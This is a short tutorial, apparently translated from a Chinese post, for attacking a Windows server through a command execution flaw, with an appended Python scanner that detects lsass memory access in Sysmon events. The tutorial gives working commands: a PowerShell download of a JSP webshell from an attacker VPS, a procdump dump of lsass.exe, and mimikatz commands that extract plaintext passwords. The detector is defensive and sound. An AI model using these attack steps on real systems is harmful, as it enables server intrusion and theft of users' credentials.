Premise:
There is a Windows server with a command execution vulnerability.
Usage:
1. Upload a one-line webshell (一句话木马) to your VPS, then use the command execution vulnerability to make the server download it (you need to know the absolute path on the server):
http://url?pwd=zs&cmd=cmd+/c+powershell+(new-object System.Net.WebClient).DownloadFile('http://vps/shell.txt','C:/绝对路径/shy.jsp')
2. Connect with China Chopper (菜刀), upload procdump64.exe and dump the lsass.exe process:
./procdump64.exe -accepteula -ma lsass.exe lsass.dmp
3. Copy the captured lsass.dmp to your local machine and use mimikatz to extract the plaintext passwords locally:
mimikatz.exe
"sekurlsa::minidump lsass.dmp"
"sekurlsa::logonPasswords full"
exit
It seems that as long as the password is strong enough, no plaintext can be captured, so I won't post a screenshot.
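Added example for the defensive side of step 2 (not code from the original post): a small Python scanner over Sysmon Event ID 10 (ProcessAccess) messages that flags any non-allowlisted process opening lsass.exe with PROCESS_VM_READ, the right a full memory dump such as procdump -ma needs. The sample event messages, the source paths and the allowlist are constructed assumptions.

```python
import re

# Windows process access rights relevant to reading another process's memory.
PROCESS_VM_READ = 0x10
PROCESS_QUERY_INFORMATION = 0x400

# Assumed allowlist of processes that may legitimately read lsass; tune per host.
# "agent.exe" is a placeholder for a trusted security agent, not a real product path.
DEFAULT_ALLOWLIST = {r"c:\program files\securityvendor\agent.exe"}

# Constructed Sysmon Event ID 10 messages (not real telemetry), in the
# "Key: Value" line layout Sysmon uses for its event descriptions.
SAMPLE_EVENTS = [
    "Process accessed:\nRuleName: -\nSourceImage: C:\\inetpub\\tools\\procdump64.exe\n"
    "TargetImage: C:\\Windows\\system32\\lsass.exe\nGrantedAccess: 0x1FFFFF\n"
    "CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d0e4|C:\\Windows\\System32\\KERNELBASE.dll+2bd2e",
    "Process accessed:\nRuleName: -\nSourceImage: C:\\Program Files\\SecurityVendor\\agent.exe\n"
    "TargetImage: C:\\Windows\\system32\\lsass.exe\nGrantedAccess: 0x1FFFFF\nCallTrace: -",
    "Process accessed:\nRuleName: -\nSourceImage: C:\\Windows\\system32\\csrss.exe\n"
    "TargetImage: C:\\Windows\\system32\\lsass.exe\nGrantedAccess: 0x1000\nCallTrace: -",
    "Process accessed:\nRuleName: -\nSourceImage: C:\\Windows\\system32\\svchost.exe\n"
    "TargetImage: C:\\Windows\\system32\\svchost.exe\nGrantedAccess: 0x1FFFFF\nCallTrace: -",
]

FIELD_RE = re.compile(r"^(\w+): (.*)$", re.MULTILINE)


def parse_event(message):
    """Turn the 'Key: Value' lines of a Sysmon event message into a dict."""
    return dict(FIELD_RE.findall(message))


def is_lsass_dump_attempt(fields, allowlist=DEFAULT_ALLOWLIST):
    """True when a non-allowlisted process opened lsass.exe with memory-read rights."""
    target = fields.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    source = fields.get("SourceImage", "").lower()
    if source in allowlist:
        return False
    granted = int(fields.get("GrantedAccess", "0x0"), 16)
    # PROCESS_VM_READ is the bit a memory dump cannot do without; a query-only
    # open (0x1000 / PROCESS_QUERY_LIMITED_INFORMATION) is normal and ignored.
    return bool(granted & PROCESS_VM_READ)


def scan(messages, allowlist=DEFAULT_ALLOWLIST):
    """Return the SourceImage of every event that looks like an lsass dump."""
    events = (parse_event(m) for m in messages)
    return [e["SourceImage"] for e in events if is_lsass_dump_attempt(e, allowlist)]
```

Feeding real events means pulling the message text of Sysmon/Operational Event ID 10 into the same function; the 0x1FFFFF mask from procdump is the textbook signature, but any mask with the 0x10 bit set is worth a look.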